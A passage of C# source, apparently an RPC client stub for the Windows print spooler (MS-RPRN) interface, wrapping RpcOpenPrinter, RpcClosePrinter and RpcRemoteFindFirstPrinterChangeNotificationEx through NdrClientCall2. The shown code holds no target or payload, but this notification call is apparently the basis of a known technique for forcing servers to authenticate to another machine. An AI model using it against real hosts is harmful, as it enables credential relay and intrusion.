if (IntPtr.Size == 8)
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\spoolss");
}
else
{
InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\spoolss");
}
}
[SecurityPermission(SecurityAction.Demand, Flags = SecurityPermissionFlag.UnmanagedCode)]
~rprn()
{
freeStub();
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct DEVMODE_CONTAINER
{
Int32 cbBuf;
IntPtr pDevMode;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct RPC_V2_NOTIFY_OPTIONS_TYPE
{
UInt16 Type;
UInt16 Reserved0;
UInt32 Reserved1;
UInt32 Reserved2;
UInt32 Count;
IntPtr pFields;
};
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public struct RPC_V2_NOTIFY_OPTIONS
{
UInt32 Version;
UInt32 Reserved;
UInt32 Count;
/* [unique][size_is] */
RPC_V2_NOTIFY_OPTIONS_TYPE pTypes;
};
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 RpcOpenPrinter(string pPrinterName, out IntPtr pHandle, string pDatatype, ref DEVMODE_CONTAINER pDevModeContainer, Int32 AccessRequired)
{
IntPtr result = IntPtr.Zero;
IntPtr intptrPrinterName = Marshal.StringToHGlobalUni(pPrinterName);
IntPtr intptrDatatype = Marshal.StringToHGlobalUni(pDatatype);
pHandle = IntPtr.Zero;
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(36), pPrinterName, out pHandle, pDatatype, ref pDevModeContainer, AccessRequired);
}
else
{
IntPtr tempValue = IntPtr.Zero;
GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
GCHandle handleDevModeContainer = GCHandle.Alloc(pDevModeContainer, GCHandleType.Pinned);
IntPtr tempValueDevModeContainer = handleDevModeContainer.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(34, intptrPrinterName, tempValuePointer, intptrDatatype, tempValueDevModeContainer, new IntPtr(AccessRequired));
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
pHandle = Marshal.ReadIntPtr(tempValuePointer);
}
finally
{
handle.Free();
handleDevModeContainer.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("RpcOpenPrinter failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
finally
{
if (intptrPrinterName != IntPtr.Zero)
Marshal.FreeHGlobal(intptrPrinterName);
if (intptrDatatype != IntPtr.Zero)
Marshal.FreeHGlobal(intptrDatatype);
}
return (int)result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 RpcClosePrinter(ref IntPtr ServerHandle)
{
IntPtr result = IntPtr.Zero;
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(1076), ref ServerHandle);
}
else
{
IntPtr tempValue = ServerHandle;
GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
IntPtr tempValuePointer = handle.AddrOfPinnedObject();
try
{
result = CallNdrClientCall2x86(1018, tempValuePointer);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
ServerHandle = Marshal.ReadIntPtr(tempValuePointer);
}
finally
{
handle.Free();
}
}
}
catch (SEHException)
{
Trace.WriteLine("RpcClosePrinter failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
return (int)result.ToInt64();
}
[SecurityPermission(SecurityAction.LinkDemand, Flags = SecurityPermissionFlag.UnmanagedCode)]
public Int32 RpcRemoteFindFirstPrinterChangeNotificationEx(
/* [in] */ IntPtr hPrinter,
/* [in] */ UInt32 fdwFlags,
/* [in] */ UInt32 fdwOptions,
/* [unique][string][in] */ string pszLocalMachine,
/* [in] */ UInt32 dwPrinterLocal)
{
IntPtr result = IntPtr.Zero;
IntPtr intptrLocalMachine = Marshal.StringToHGlobalUni(pszLocalMachine);
try
{
if (IntPtr.Size == 8)
{
result = NativeMethods.NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(2308), hPrinter, fdwFlags, fdwOptions, pszLocalMachine, dwPrinterLocal, IntPtr.Zero);
}
else
{
try
{
result = CallNdrClientCall2x86(2178, hPrinter, new IntPtr(fdwFlags), new IntPtr(fdwOptions), intptrLocalMachine, new IntPtr(dwPrinterLocal), IntPtr.Zero);
// each pinvoke work on a copy of the arguments (without an out specifier)
// get back the data
}
finally
{
}
}
}
catch (SEHException)
{
Trace.WriteLine("RpcRemoteFindFirstPrinterChangeNotificationEx failed 0x" + Marshal.GetExceptionCode().ToString("x"));
return Marshal.GetExceptionCode();
}
finally
{
if (intptrLocalMachine != IntPtr.Zero)
Marshal.FreeHGlobal(intptrLocalMachine);
}
return (int)result.ToInt64();
}
}
}